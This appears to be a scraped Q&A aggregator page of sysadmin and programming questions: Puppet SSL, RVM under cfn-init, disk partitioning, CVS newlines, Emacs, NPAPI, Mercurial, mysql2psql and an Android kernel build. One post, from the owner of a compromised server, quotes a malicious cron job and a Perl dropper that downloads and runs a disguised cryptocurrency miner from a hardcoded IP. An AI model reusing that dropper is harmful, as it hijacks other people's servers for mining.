MAIL=[DIR] PATH=[DIRS] INPUTRC=/etc/inputrc PWD=[PWD] JAVA_HOME=/opt/jdk1.6.0_21 LANG=en_US.UTF-8 SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass M2_HOME=/opt/apache-maven-2.2.1 SHLVL=1 HOME=[~] LOGNAME=[USER] SSH_CONNECTION=::[STUFF] LESSOPEN=|/usr/bin/lesspipe.sh %s G_BROKEN_FILENAMES=1 _=/bin/grep OLDPWD=[DIR] I just realized that the stop) part of prog.sh isn't actually a guarantee that the process it claims to be stopping is running -- it just tries to kill the PID and suppresses all output then deletes the temporary file and manually inserts STOPPED into the log file. So I'm no longer so certain that the process is always running when I ps for it, although the code sample above indicates that it at least runs erratically. I'll continue looking into this undocumented behemoth when I return to work tomorrow.
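    For reference, a couple of ways to look for the JVM without trusting the PID file; just a sketch, with the jar name taken from the script above:
      # match against the full command line instead of the process name
      pgrep -fl prog.jar
      ps -ef | grep '[p]rog.jar'        # the [p] trick keeps grep itself out of the results
      # show the process tree, in case the JVM is hanging off the su/nohup wrapper
      ps -ef --forest | less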

    Read the article

  • Puppet gives SSL error because master is not running?

    - by Daniel Huger
    I started with two clean machines this time. My master is running 12.04 Version: 2.7.11-1ubuntu2 Depends: ruby1.8, puppetmaster-common (= 2.7.11-1ubuntu2) My client is 10.04 Version: 2.6.3-0ubuntu1~lucid1 Depends: puppet-common (= 2.6.3-0ubuntu1~lucid1), ruby1.8 To setup Puppet tutorial: http://shapeshed.com/setting-up-puppet-on-ubuntu-10-04/ To connect master and client: http://shapeshed.com/connecting-clients-to-a-puppet-master/ The first time I tried to connect master to client failed with SSL_connect error. So I did rm -rf /etc/puppet/ssl/ to remove all the keys inside ssl folders. It looked like it work.... BUT client# puppet agent --server puppet --waitforce 60 --test /usr/lib/ruby/1.8/facter/util/resolution.rb:46: warning: Insecure world writable dir /etc/condor in PATH, mode 040777 /usr/lib/ruby/1.8/puppet/defaults.rb:67: warning: Insecure world writable dir /etc/condor in PATH, mode 040777 info: Creating a new SSL key for giab10 warning: peer certificate won't be verified in this SSL session info: Caching certificate for ca warning: peer certificate won't be verified in this SSL session warning: peer certificate won't be verified in this SSL session info: Creating a new SSL certificate request for mybox123 info: Certificate Request fingerprint (md5): XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX warning: peer certificate won't be verified in this SSL session warning: peer certificate won't be verified in this SSL session warning: peer certificate won't be verified in this SSL session warning: peer certificate won't be verified in this SSL session info: Caching certificate for mybox123 err: Could not retrieve catalog from remote server: SSL_connect returned=1 errno=0 state=SSLv3 read server certificate B: certificate verify failed warning: Not using cache on failed catalog It cached but then it couldn't retrieve it. Let me stop here.... worrying I would mess something up. But let's check master's status. * master is not running WoW.... ??? master# service puppetmaster start * Starting puppet master [OK] master# service puppetmaster status * master is not running I think time is sync. Well, we are behind a firewall so the port to sync time is disbaled. I checked with date and they seem okay. What about master not running? Is that the cause? Any help is appreciated. Thanks! /var/lib/puppet/log/masterhttp.log [2012-06-30 00:13:25] INFO WEBrick 1.3.1 [2012-06-30 00:13:25] INFO ruby 1.8.7 (2011-06-30) [x86_64-linux] [2012-06-30 00:13:25] WARN TCPServer Error: Address already in use - bind(2) [2012-06-30 00:19:40] INFO WEBrick 1.3.1 [2012-06-30 00:19:40] INFO ruby 1.8.7 (2011-06-30) [x86_64-linux] [2012-06-30 00:19:40] WARN TCPServer Error: Address already in use - bind(2) [2012-06-30 00:28:58] INFO WEBrick 1.3.1 [2012-06-30 00:28:58] INFO ruby 1.8.7 (2011-06-30) [x86_64-linux] [2012-06-30 00:28:58] WARN TCPServer Error: Address already in use - bind(2) [2012-06-30 15:31:25] INFO WEBrick 1.3.1 [2012-06-30 15:31:25] INFO ruby 1.8.7 (2011-06-30) [x86_64-linux] [2012-06-30 15:31:25] WARN TCPServer Error: Address already in use - bind(2) 1 S puppet 5186 1 0 80 0 - 29410 poll_s 15:44 ? 00:00:00 /usr/bin/ruby1.8 /usr/bin/puppet master --masterport=8140 4 S root 5235 5005 0 80 0 - 2344 pipe_w 15:45 pts/0 00:00:00 grep --color=auto puppet kill -9 5186 puppet master service puppetmaster status * master is not running I always have this error, but I always ignored it. http://pastebin.com/exbpArjv What could it mean? Time sync? Package not installed? Then how could we do puppetca in the first place?
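    A couple of checks that look relevant here, written only as a sketch (the agent name mybox123 comes from the output above, and on these packages the client ssl directory is usually /var/lib/puppet/ssl rather than /etc/puppet/ssl, so treat the paths as assumptions for your setup):
      # on the master: see what already owns port 8140; the WEBrick "Address already in use"
      # messages suggest another master instance (Passenger/Apache?) is bound to it
      netstat -tlnp | grep 8140
      # on the master: discard the client's old signed certificate
      puppet cert clean mybox123        # "puppetca --clean mybox123" on older releases
      # on the client: wipe its ssl directory and request a fresh certificate
      rm -rf /var/lib/puppet/ssl
      puppet agent --server puppet --waitforcert 60 --test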

    Read the article

  • multi-user rvm gem install failure when called from CloudFormation::Init

    - by Peter Mounce
    I've taken an Amazon Linux AMI (based on CentOS) and installed RVM (1.10.3) to it in multi-user fashion (see {1} below). I used that to install ruby 1.9.3-p125, rubygems 1.8.17, and bundler 1.1 as the baseline requirements for most things I'm going to be using the instances for. I've captured that instance to an AMI, and am now launching it via CloudFormation, with some CloudFormation::Init commands. One of them is to use s3cmd to pull down a private gem from S3, and the next one, the one that fails, is to install that gem. It fails with an error message 2012-03-15 16:53:20,201 [ERROR] Command 20_install_gems (/usr/local/rvm/rubies/ruby-1.9.3-p125/bin/gem install ./*.gem) failed 2012-03-15 16:53:20,202 [DEBUG] Command 20_install_gems output: /usr/local/rvm/rubies/ruby-1.9.3-p125/bin/gem:12:in `require': no such file to load -- rubygems (LoadError) from /usr/local/rvm/rubies/ruby-1.9.3-p125/bin/gem:12 Now, that happens during the cfn-init execution - I assume, but haven't checked yet, that cfn-init is being run with an environment different from that of ec2-user (there are no other users on the instance). If I run gem install mygem.gem in an interactive session then that works fine. So, my question really, is what should I do to make this work for cfn-init? Have I correctly set up rvm as multi-user? I've confirmed that cfn-init is being run as the root user, with his restricted environment. How should I source the /etc/profile.d/rvm.sh into root's sessions? {1} My semi-automated rvm installation steps (run in interactive session as ec2-user): sudo bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer ) sudo gpasswd -a ec2-user rvm # iconv-devel is baked into centos' glibc sudo yum install -y autoconf automake bison bzip2 gcc-c++ git libffi-devel libtool libxml2-devel libxslt-devel libyaml-devel make openssl-devel patch readline readline-devel zlib zlib-devel source /etc/profile.d/rvm.sh rvm list known # in a new session: rvm install ruby-1.9.3-p125 rvm use 1.9.3 --default gem update --system # gems required by public_web-awareness gem install aws-sdk bundler cocaine sinatra echo -e "gem: --no-ri --no-rdoc\n" > /home/ec2-user/.gemrc # delete unnecessary documentation files rm -rf `gem env gemdir`/doc sudo -s sudo echo -e "gem: --no-ri --no-rdoc\n" > /etc/skel/.gemrc sudo echo -e "gem: --no-ri --no-rdoc\n" > /etc/gemrc # ctrl + d out of the sudo session Some environment information: [ec2-user@ip ~]$ echo $PATH /usr/local/rvm/gems/ruby-1.9.3-p125/bin:/usr/local/rvm/gems/ruby-1.9.3-p125@global/bin:/usr/local/rvm/rubies/ruby-1.9.3-p125/bin:/usr/local/rvm/bin:/usr/local/bin:/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/sbin:/opt/aws/bin:/home/ec2-user/bin [ec2-user@ip ~]$ echo $GEM_HOME /usr/local/rvm/gems/ruby-1.9.3-p125 [ec2-user@ip ~]$ echo $GEM_PATH /usr/local/rvm/gems/ruby-1.9.3-p125:/usr/local/rvm/gems/ruby-1.9.3-p125@global [ec2-user@ip ~]$ echo $BUNDLE_PATH [ec2-user@ip ~]$ gem list *** LOCAL GEMS *** aws-sdk (1.3.6) bundler (1.1.0) cocaine (0.2.1) httparty (0.8.1) json (1.6.5) multi_json (1.1.0) multi_xml (0.4.1) nokogiri (1.5.1, 1.5.0) rack (1.4.1) rack-protection (1.2.0) rake (0.9.2) sinatra (1.3.2) tilt (1.3.3) uuidtools (2.1.2) yamler (0.1.0)
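    One thing I plan to try is forcing the cfn-init command through a login shell so that /etc/profile.d/rvm.sh is sourced before gem is resolved; just a sketch, and the download path for the gems is an assumption:
      # candidate command string for the 20_install_gems entry
      /bin/bash -l -c 'gem install /tmp/gems/*.gem'
      # or, spelling it out instead of relying on a login shell:
      /bin/bash -c 'source /etc/profile.d/rvm.sh && gem install /tmp/gems/*.gem'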

    Read the article

  • overriding new ubuntu installation

    - by tkoomzaaskz
    I've got an Ubuntu 11.10 install which lost its support in May 2013; now I'd like to reinstall up to the most up-to-date LTS, which is 12.04. My question is regarding my current partitions and doing backups. Is there a safe way to back up my data on some local partitions instead of copying files onto DVDs/external drives (that is very uncomfortable in my situation)? The following system commands show my disk:
      $ lsblk
      NAME   MAJ:MIN RM   SIZE RO MOUNTPOINT
      sda      8:0    0 232,9G  0
      +-sda1   8:1    0  48,8G  0
      +-sda2   8:2    0    63G  0
      +-sda3   8:3    0     1K  0
      +-sda4   8:4    0  53,7G  0 /
      +-sda5   8:5    0  18,6G  0
      +-sda6   8:6    0  25,5G  0
      +-sda7   8:7    0  23,3G  0 [SWAP]
      sr0     11:0    1  1024M  0
    and
      $ sudo fdisk -l
      [sudo] password for xyz:
      Disk /dev/sda: 250.1 GB, 250059350016 bytes
      heads: 255, sectors/track: 63, cylinders: 30401, total 488397168 sectors
      Units = sectors of 1 * 512 = 512 bytes
      Sector size (logical/physical): 512 bytes / 512 bytes
      I/O size (minimum/optimal): 512 bytes / 512 bytes
      Disk identifier: 0xc3ffc3ff
      Device    Boot      Start        End     Blocks  Id System
      /dev/sda1 *          2048  102402047   51200000   7 HPFS/NTFS/exFAT
      /dev/sda2       215044096  347080703   66018304   7 HPFS/NTFS/exFAT
      /dev/sda3       347082750  488392064   70654657+  5 Extended
      /dev/sda4       102402048  215042047   56320000  83 Linux
      /dev/sda5       395905923  434975939   19535008+ 83 Linux
      /dev/sda6       434976003  488392064   26708031  83 Linux
      /dev/sda7       347082752  395905023   24411136  82 Linux swap / Solaris
    In the beginning I had Windows Vista pre-installed with the machine when it was bought (damn!) and I installed Linux (the one I have now). The Windows program in the master boot record has been overridden by GRUB and now I can boot both Windows and Linux. This is the list of mounted devices:
      $ mount
      /dev/sda4 on / type ext4 (rw,errors=remount-ro,commit=0)
      proc on /proc type proc (rw,noexec,nosuid,nodev)
      sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
      fusectl on /sys/fs/fuse/connections type fusectl (rw)
      none on /sys/kernel/debug type debugfs (rw)
      none on /sys/kernel/security type securityfs (rw)
      udev on /dev type devtmpfs (rw,mode=0755)
      devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
      tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
      none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
      none on /run/shm type tmpfs (rw,nosuid,nodev)
      binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev)
      gvfs-fuse-daemon on /home/tomasz/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=tomasz)
    It's strange (I don't remember doing such a thing) that my current Linux uses only one partition (/dev/sda4). But, anyway, that seems to be the case. My final question is: am I able to use one of the existing Linux partitions for a backup and install Ubuntu 12.04 without removing either Windows or Ubuntu 11.10? I mean: will GRUB automatically accept both the old Windows Vista and the two Linuxes (the old 11.10 and the "new" 12.04)? Is there any hidden operation done during installation that could harm my custom backup partition? My fstab file:
      proc /proc proc nodev,noexec,nosuid 0 0
      # / was on /dev/sda4 during installation
      UUID=d44e89f5-9da2-48eb-83b3-887652ec95d2 / ext4 errors=remount-ro 0 1
      # swap was on /dev/sda7 during installation
      UUID=bbe50535-ba57-434a-9272-211d859f0e00 none swap sw 0 0
    sda5 and sda6 are leftover partitions created during an unsuccessful Linux installation (the one before my current installation). I didn't delete these partitions, and I have access to them (so I can use them as backup partitions).
    Edit: A second question: why does lsblk show /dev/sda as 232,9G while fdisk says it has 250.1 GB? Where does the difference come from?
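    To make the first question concrete, this is roughly the kind of backup I have in mind, assuming /dev/sda6 still carries a usable filesystem (if it doesn't, it would need an mkfs first, which wipes it):
      sudo mkdir -p /mnt/backup
      sudo mount /dev/sda6 /mnt/backup
      # -a preserves permissions and ownership; the trailing slash on /home/ copies its contents
      sudo rsync -a --progress /home/ /mnt/backup/home-backup/
      sudo cp /etc/fstab /mnt/backup/fstab.backup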

    Read the article

  • ./kernelupdates 100% cpu usage

    - by Vaibhav Panmand
    I have a CENTOS6 server running with some wordpress & tomcat websites. In the last two days it has been crashing continuously. After investigation we found that kernelupdates binary consuming 100% cpu on server. Process is mentioned below. ./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx But this process seems invalid kernel update. Might be server is compromised and this process is installed by hacker, So I've killed this process & removed apache user's cron entries. But somehow this process started again after couple of hours & cron entries also restored, I am searching for the thing which is modifying cron jobs. Does this process belong to a mining process? How can we stop cronjob modification and clean the source of this process? Cron entry (apache user) /6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* abc.txt #!/usr/bin/perl system("killall -9 minerd"); system("killall -9 PWNEDa"); system("killall -9 PWNEDb"); system("killall -9 PWNEDc"); system("killall -9 PWNEDd"); system("killall -9 PWNEDe"); system("killall -9 PWNEDg"); system("killall -9 PWNEDm"); system("killall -9 minerd64"); system("killall -9 minerd32"); system("killall -9 named"); $rn=1; $ar=`uname -m`; while($rn==1 || $rn==0) { $rn=int(rand(11)); } $exists=`ls /tmp/.ice-unix`; $cratch=`ps aux | grep -v grep | grep kernelupdates`; if($cratch=~/kernelupdates/gi) { die; } if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) { $wig=`wget --version | grep GNU`; if(length($wig>6)) { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } else { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } } @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382'); $prt=0; while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; } print "setup for $rn:$prt done :-)\n"; system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &"); print "done!\n"; Thanks in advance!
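    A containment sketch I'm considering while hunting for the entry point (the paths match the output above; these are containment steps only, not a cleanup recipe, and a compromised host really wants a rebuild):
      # inspect every cron location, not just the apache user's crontab
      ls -la /var/spool/cron/ /etc/cron.d/ /etc/cron.hourly/
      # look for files dropped or modified around the time the job reappears
      find / -xdev -type f -mmin -120 2>/dev/null
      # temporary containment: drop the malicious crontab and pin an empty one in place
      crontab -r -u apache
      touch /var/spool/cron/apache && chattr +i /var/spool/cron/apache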

    Read the article

  • ASP.NET MVC tries to load older version of Owin assembly

    - by d_mcg
    As a bit of context, I'm developing an ASP.NET MVC 5 application that uses OAuth-based authentication via Microsoft's OWIN implementation, for Facebook and Google only at this stage. Currently (as of v3.0.0, git-commit 4932c2f), the FacebookAuthenticationOptions and GoogleOAuth2AuthenticationOptions don't provide any property to force Facebook nor Google respectively to reauthenticate users (via appending the appropriate query string parameters) when signing in. Initially, I set out to override the following classes: FacebookAuthenticationOptions GoogleOAuth2AuthenticationOptions FacebookAuthenticationHandler (specifically AuthenticateCoreAsync()) GoogleOAuth2AuthenticationHandler (specifically AuthenticateCoreAsync()) yet discovered that the ~AuthenticationHandler classes are marked as internal. So I pulled a copy of the source for the Katana project (http://katanaproject.codeplex.com/) and modified the source accordingly. After compiling, I found that there are several dependencies that needed updating in order to use these updated assemblies (Microsoft.Owin.Security.Facebook and Microsoft.Owin.Security.Google) in the MVC project: Microsoft.Owin Microsoft.Owin.Security Microsoft.Owin.Security.Cookies Microsoft.Owin.Security.OAuth Microsoft.Owin.Host.SystemWeb This was done by replacing the existing project references to the 3.0.0 versions and updating those in web.config. Good news: the project compiles successfully. In debugging, I received an exception on startup: An exception of type 'System.IO.FileLoadException' occurred in [MVC web assembly].dll but was not handled in user code Additional information: Could not load file or assembly 'Microsoft.Owin.Security, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. The located assembly's manifest definition does not match the assembly reference. (Exception from HRESULT: 0x80131040) The underlying exception indicated that Microsoft.AspNet.Identity.Owin was trying to load v2.1.0 of Microsoft.Owin.Security when calling app.UseExternalSignInCookie() from Startup.ConfigureAuth(IAppBuilder app) in Startup.Auth.cs. Unfortunately that assembly (and its other dependency, Microsoft.AspNet.Identity.Owin) aren't part of the Project Katana solution, and I can't find any accessible repository for these assemblies online. Are the Microsoft.AspNet.Identity assemblies open source, like the Katana project? Is there a way to fool those assemblies to use the referenced v3.0.0 assemblies instead of v2.1.0? The /bin folder contains the 3.0.0 versions of the Owin assemblies. I've upgraded the NuGet packages for Microsoft.AspNet.Identity.Owin, and this is still an issue. Any ideas on how to resolve this issue?
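    One standard way to make the 2.1.0 reference resolve to the 3.0.0 assemblies is an assembly binding redirect in the MVC project's web.config. The sketch below covers Microsoft.Owin.Security only; the sibling Owin assemblies would need matching entries, and whether Microsoft.AspNet.Identity.Owin actually behaves correctly against the 3.0.0 surface at runtime is a separate question:
      <runtime>
        <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
          <dependentAssembly>
            <assemblyIdentity name="Microsoft.Owin.Security" publicKeyToken="31bf3856ad364e35" culture="neutral" />
            <bindingRedirect oldVersion="0.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
          </dependentAssembly>
        </assemblyBinding>
      </runtime>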

    Read the article

  • Wrapping malloc - C

    - by Appu
    I am a beginner in C. While reading git's source code, I found this wrapper function around malloc:
      void *xmalloc(size_t size)
      {
          void *ret = malloc(size);
          if (!ret && !size)
              ret = malloc(1);
          if (!ret) {
              release_pack_memory(size, -1);
              ret = malloc(size);
              if (!ret && !size)
                  ret = malloc(1);
              if (!ret)
                  die("Out of memory, malloc failed");
          }
      #ifdef XMALLOC_POISON
          memset(ret, 0xA5, size);
      #endif
          return ret;
      }
    Questions: 1. I couldn't understand why they are using malloc(1). 2. What does release_pack_memory do? I can't find this function's implementation anywhere in the source code. 3. What does the #ifdef XMALLOC_POISON memset(ret, 0xA5, size); block do? I am planning to reuse this function in my project. Is this a good wrapper around malloc? Any help would be great.

    Read the article

  • recent cvs cygwin newline windows problems. How to solve?

    - by user72150
    Hi all, one of our projects still uses CVS. Recently (sometime in the past year) the Cygwin cvs client (currently 1.12.13) has given me problems when I update. I suspect the problem stems from Windows/Unix newline differences. It worked for years without a problem. Here are the symptoms I see when I update from the command line:
      "no such repository" messages:
        /cvshome : no such repository
      False "Modified" flags due to newline differences:
        M java/com/foo/ekm/value/EkmContainerInstance.java
      False "Conflicts":
        cvs update: Updating java/com/foo/ekm/value/XWiki
        cvs update: move away `java/com/foo/ekm/value/XWiki/XWikiContainerInstance.java'; it is in the way
        C java/com/foo/ekm/value/XWiki/XWikiContainerInstance.java
    Note that for the 'no such repository' error, I found that cd-ing into the 'CVS/' folder and running 'dos2unix Root' makes the update work again. I'm not sure how this file (or Repository, or Entries) gets whacked, and I don't remember when these problems started. I do have a workaround: updating from our IDE (IntelliJ IDEA) always succeeds. Yes, I know we should switch to (svn|git|mercurial), but does anyone know what causes these problems, when they were introduced, and what the workarounds are? Thanks, bill
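    In case it saves someone some typing, here is the dos2unix workaround generalized over the whole checkout; it simply runs dos2unix on every CVS metadata file it finds:
      find . \( -path '*/CVS/Root' -o -path '*/CVS/Repository' -o -path '*/CVS/Entries' \) -exec dos2unix {} +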

    Read the article

  • emacs frustration with web development any working dot-files?

    - by Tony Cruise
    I really liked the flexibility of Emacs, but it is really annoying to get it working. I want to use it for web development: HTML, CSS, JavaScript, PHP. I first tried emacs-starter-kit. It didn't include nXhtml. Also, the C-g key binding does not work (they call it a starter kit, but a basic key command does not work); I think it is remapped for git control. That's frustrating for a beginner. Then I replaced emacs-starter-kit with nXhtml. At least C-g works. But code completion is poor: M-tab does not work, and I tried code completion from the nXhtml menu with no success. Also, nXhtml mode didn't colorize my file when CSS is mixed with HTML. Isn't it recommended for mixed HTML, CSS and PHP files? So why doesn't it work? Why aren't the Emacs folks aware of convention over configuration? Damn! Ship something that works! Please help me before I go crazy. I use Ubuntu 10.04 and emacs-snapshot-gtk 23.1.50-1. Please guide me step by step with your working dotfile URL. I accept that I am a dummy, but it is really annoying and frustrating to use Emacs.
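    To show the kind of answer I'm after, the minimal setup I've seen suggested is just loading nXhtml's autostart file from the init file; this is a sketch, and the path is wherever the nXhtml download was unpacked:
      ;; ~/.emacs - minimal nXhtml setup (the path below is an assumption)
      (load "~/.emacs.d/nxhtml/autostart.el")
      ;; autostart.el wires up the mumamo multi-major modes, which are what give
      ;; mixed HTML/CSS/JS/PHP buffers per-chunk fontification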

    Read the article

  • Fail to load NPAPI plugin in Google Chrome on Mac OS X

    - by Roman
    I have been trying to get Google Chrome (6.0.401.1 dev) on Mac OS X to load an NPAPI plugin without success so far. I have been working around the npsimple example from here: http://git.webvm.net/?p=npsimple. Using gcc on Mac and VC++ 2008 on Windows I managed to get it running on Safari and Firefox on Mac OS X and Firefox and Google Chrome on Windows, but not on Google Chrome on Mac OS X. When trying to debug Google Chrome on Mac OS X it seemed Google Chrome was briefly dyld-loading (and immediately dyld-unloading) the plugin on startup, but without actually looking-up any symbols within the plugin or calling any of the functions. It seemed to be doing that for every plugin, though. Also, when loading a page with the embed-tag for the plugin, Google Chrome did not seem to even dyld-load the plugin and no functions were called (not even NP_GetEntryPoints). Google Chrome also does not output any error message, it just simply does not load the plugin. I am not sure I caught everything with gdb because of Google Chrome using different processes, but I have also tried all the switches like --no-sandbox, --single-process and --plugin-startup-dialog (which incidentally does not seem to work at all on Mac OS X). I also made sure the architecture of the binary matches (i.e. 32-bit for Google Chrome). Has anybody had similar problems before? Is there anything I am missing here, like a gcc switch when compiling or something? Any help would be greatly appreciated.
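    One thing worth double-checking on the Mac side (a guess, since the same code works elsewhere): Chrome, like Safari, only picks up NPAPI plugins that are packaged as a .plugin bundle in /Library/Internet Plug-Ins or ~/Library/Internet Plug-Ins, with the WebKit plugin keys present in the bundle's Info.plist; a bare dylib tends to be ignored with no error message at all. A sketch of the relevant keys, where the names and MIME type are placeholders:
      <key>WebPluginName</key>
      <string>NPSimple</string>
      <key>WebPluginDescription</key>
      <string>Sample NPAPI plugin</string>
      <key>WebPluginMIMETypes</key>
      <dict>
          <key>application/x-npsimple</key>
          <dict>
              <key>WebPluginTypeDescription</key>
              <string>NPSimple sample content</string>
          </dict>
      </dict>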

    Read the article

  • Converting from CVS to SVN to Hg, does 'hg convert' require pointing to an SVN checkout or just a repo?

    - by Terry
    As part of migrating full CVS history to Hg, I've used cvs2svn to create an SVN repo in a local directory. Its first-level directory structure is:

        2010-04-21  09:39 AM    <DIR>          .
        2010-04-21  09:39 AM    <DIR>          ..
        2010-04-21  09:39 AM    <DIR>          locks
        2010-04-21  09:39 AM    <DIR>          hooks
        2010-04-21  09:39 AM    <DIR>          conf
        2010-04-21  09:39 AM               229 README.txt
        2010-04-21  11:45 AM    <DIR>          db
        2010-04-21  09:39 AM                 2 format
                       2 File(s)            231 bytes

    After setting up hg and the convert extension, I get the following when I attempt the conversion:

        C:\>hg convert file://localhost/Users/terry/Desktop/repoSVN
        assuming destination repoSVN-hg
        initializing destination repoSVN-hg repository
        file://localhost/Users/terry/Desktop/repoSVN does not look like a CVS checkout
        file://localhost/Users/terry/Desktop/repoSVN does not look like a Git repo
        file://localhost/Users/terry/Desktop/repoSVN does not look like a Subversion repo
        file://localhost/Users/terry/Desktop/repoSVN is not a local Mercurial repo
        file://localhost/Users/terry/Desktop/repoSVN does not look like a darcs repo
        file://localhost/Users/terry/Desktop/repoSVN does not look like a monotone repo
        file://localhost/Users/terry/Desktop/repoSVN does not look like a GNU Arch repo
        file://localhost/Users/terry/Desktop/repoSVN does not look like a Bazaar repo
        file://localhost/Users/terry/Desktop/repoSVN does not look like a P4 repo
        abort: file://localhost/Users/terry/Desktop/repoSVN: missing or unsupported repository

    I have TortoiseHg installed. For info, hg version reports: Mercurial Distributed SCM (version 1.4.3). This version of Mercurial seems to have some svn bindings, if library.zip in the install is to be believed. Do I need to do a checkout and point hg convert at it for this to work properly?
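
    For reference, a sketch of the invocation that should work once Mercurial can actually see working Subversion Python bindings: the convert extension's SVN source needs them, and without them hg falls through every source type exactly as shown above. The paths simply mirror the ones in the question.

        # The source can be the repository directory cvs2svn produced; no checkout is needed.
        hg convert file://localhost/Users/terry/Desktop/repoSVN repoSVN-hg
        # or, equivalently, a plain local path:
        hg convert /Users/terry/Desktop/repoSVN repoSVN-hg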

    Read the article

  • error when running mysql2psql

    - by Mateo Acebedo
    I am trying to migrate a MySQL database to a PostgreSQL database. After installing, I run the command, and instead of generating the mysql2psql.yml file, this is what gets printed in my git bash window:

        $ mysql2psql
        c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require': cannot load such file -- 2.0/mysql_api (LoadError)
                from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require'
                from c:/Ruby200/lib/ruby/gems/2.0.0/gems/mysql-2.8.1-x86-mingw32/lib/mysql.rb:7:in `rescue in '
                from c:/Ruby200/lib/ruby/gems/2.0.0/gems/mysql-2.8.1-x86-mingw32/lib/mysql.rb:2:in `'
                from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require'
                from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require'
                from c:/Ruby200/lib/ruby/gems/2.0.0/gems/mysql2psql-0.1.0/lib/mysql2psql/mysql_reader.rb:1:in `'
                from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require'
                from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require'
                from c:/Ruby200/lib/ruby/gems/2.0.0/gems/mysql2psql-0.1.0/lib/mysql2psql.rb:5:in `'
                from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require'
                from c:/Ruby200/lib/ruby/2.0.0/rubygems/core_ext/kernel_require.rb:45:in `require'
                from c:/Ruby200/lib/ruby/gems/2.0.0/gems/mysql2psql-0.1.0/bin/mysql2psql:5:in `'
                from c:/Ruby200/bin/mysql2psql:23:in `load'
                from c:/Ruby200/bin/mysql2psql:23:in `'

    Any thoughts?
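
    A commonly suggested fix, offered here only as a sketch: the precompiled mysql 2.8.1 gem does not ship a binary for Ruby 2.0 (hence the missing 2.0/mysql_api), so rebuild the gem natively against a local MySQL installation. The connector path below is illustrative; point it at your own.

        # Replace the precompiled gem with one built against your MySQL headers.
        gem uninstall mysql
        gem install mysql --platform=ruby -- --with-mysql-dir="C:/mysql-connector-c"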

    Read the article

  • error with "pmem.c" compiling linux source code for android

    - by Preetam
    I am compiling the Linux kernel source for the Android emulator. When I execute the make command (for building and cross-compiling the kernel source) I get the following error in "pmem.c":

        root@ubuntu:~/common# make
          CHK     include/linux/version.h
          CHK     include/linux/utsrelease.h
          SYMLINK include/asm -> include/asm-x86
          CALL    scripts/checksyscalls.sh
          CHK     include/linux/compile.h
          CC      drivers/misc/pmem.o
        drivers/misc/pmem.c:441: error: conflicting types for ‘phys_mem_access_prot’
        /home/preetam/common/arch/x86/include/asm/pgtable.h:383: note: previous declaration of ‘phys_mem_access_prot’ was here
        drivers/misc/pmem.c: In function ‘flush_pmem_file’:
        drivers/misc/pmem.c:805: error: implicit declaration of function ‘dmac_flush_range’
        drivers/misc/pmem.c: In function ‘pmem_setup’:
        drivers/misc/pmem.c:1265: error: implicit declaration of function ‘ioremap_cached’
        drivers/misc/pmem.c:1266: warning: assignment makes pointer from integer without a cast
        make[2]: *** [drivers/misc/pmem.o] Error 1
        make[1]: *** [drivers/misc] Error 2
        make: *** [drivers] Error 2
        root@ubuntu:~/common#

    How do I resolve this error? It seems there may be a problem in "pmem.c" and that I might have to choose a different git repository, but that would be a very complex change now that I have already done most of the work, and I might just need the correct version of this file. Can someone tell me what I should do and how to solve these errors? Please help. Thank you!
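
    The conflicting declaration coming from arch/x86 suggests the kernel is being configured for the host architecture rather than ARM. A sketch of the usual emulator (goldfish) build, assuming the Android prebuilt arm-eabi- toolchain is on the PATH and that this tree ships a goldfish_defconfig:

        # Configure for the ARM goldfish (emulator) board and cross-compile.
        make ARCH=arm goldfish_defconfig
        make ARCH=arm CROSS_COMPILE=arm-eabi- -j4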

    Read the article

  • Fluent config not generating mapping files

    - by rboarman
